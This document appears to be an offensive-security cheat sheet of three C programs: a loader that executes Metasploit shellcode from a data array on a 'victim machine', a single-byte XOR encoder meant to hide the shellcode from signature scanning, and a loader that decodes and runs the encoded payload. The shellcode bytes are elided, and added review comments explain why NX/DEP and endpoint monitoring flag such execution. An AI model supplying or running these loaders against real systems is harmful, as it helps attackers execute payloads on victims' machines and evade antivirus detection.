C Runner

Run Metasploit shellcode

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

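/*
 * Placeholder for the payload bytes; the page elides the real content.
 * This is a file-scope, initialized, writable array, i.e. ordinary data
 * rather than code. The adjacent string literals are concatenated by the
 * compiler, and sizeof(buff) includes the terminating NUL.
 */
unsigned char buff[] =
"...."
"...shellcode..."
".....";  /* the original listing omitted this ';' and did not compile */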

int main (int argc, char **argv)
{
    /*
     * Reinterpret the address of the global data array `buff` as a function
     * with an unspecified parameter list returning int, then call it.
     * Nothing here inspects or validates the bytes; control simply transfers
     * into the array. argc and argv are unused.
     *
     * NOTE(review): converting an object pointer to a function pointer is
     * not defined by ISO C, and the call only proceeds if the memory that
     * holds `buff` is executable. A process whose instruction pointer lands
     * inside a writable data mapping is what NX/DEP and W^X policies exist
     * to stop, and it is a high-signal event for endpoint monitoring.
     */
    typedef int (*entry_fn)();
    entry_fn apple = (entry_fn)buff;

    apple();
}

Encoder C

Encoder XOR

// compile with kali machine
// gcc -o encoder.out encoder.c
// run with : ./encoder.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

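/*
 * Placeholder for the bytes the encoder reads; the page elides the real
 * content. The adjacent string literals are concatenated by the compiler,
 * and sizeof(buff) includes the terminating NUL, so a loop bounded by
 * sizeof(buff) also processes that final zero byte.
 */
unsigned char buff[] =
"...."
"...shellcode..."
".....";  /* the original listing omitted this ';' and did not compile */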
int main (int argc, char **argv)
{
    /*
     * Print every byte of the global `buff`, XORed with the fixed key 'A',
     * as a C-style \xNN escape (two upper-case hex digits). Output goes to
     * stdout with no separators and no trailing newline. The walk covers all
     * sizeof(buff) bytes, so the string literal's terminating NUL is emitted
     * too (as \x41). argc and argv are unused.
     *
     * NOTE(review): a fixed single-byte XOR is obfuscation, not encryption.
     * The key is recoverable from the output alone, so this changes what a
     * static byte signature sees but adds no confidentiality.
     */
    const char xorKey = 'A';
    const unsigned char *cursor = buff;
    const unsigned char *const end = buff + sizeof(buff);

    while (cursor != end) {
        printf("\\x%02X", *cursor ^ xorKey);
        cursor++;
    }
    return 0;
}

Runner XOR in C:

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

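/*
 * Placeholder for the encoder's output; the page elides the real content.
 * The array is deliberately non-const because main() rewrites it in place.
 * sizeof(buff) includes the string literal's terminating NUL.
 */
unsigned char buff[] =
"<encoded payload>";  /* the original listing omitted this ';' and did not compile */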

int main (int argc, char **argv)
{
    /*
     * Undo the single-byte XOR (key 'A') over the global `buff` in place,
     * then reinterpret the array's address as a function with an unspecified
     * parameter list returning int and call it. The loop stops one byte
     * short of sizeof(buff), leaving the string literal's terminating NUL
     * untouched. argc and argv are unused.
     *
     * NOTE(review): converting an object pointer to a function pointer is
     * not defined by ISO C, and the call only proceeds if the memory that
     * holds `buff` is executable. The XOR only changes the bytes stored in
     * the file; the decoded bytes sit in process memory immediately before
     * the call. Memory scanning and behavioural rules that flag execution
     * from a writable data mapping still apply.
     */
    typedef int (*entry_fn)();
    const char xorKey = 'A';
    const int last = (int) sizeof(buff) - 1;
    int i = 0;

    while (i < last) {
        buff[i] ^= xorKey;
        i++;
    }

    /* transfer control to the decoded bytes */
    entry_fn apple = (entry_fn)buff;
    apple();
}
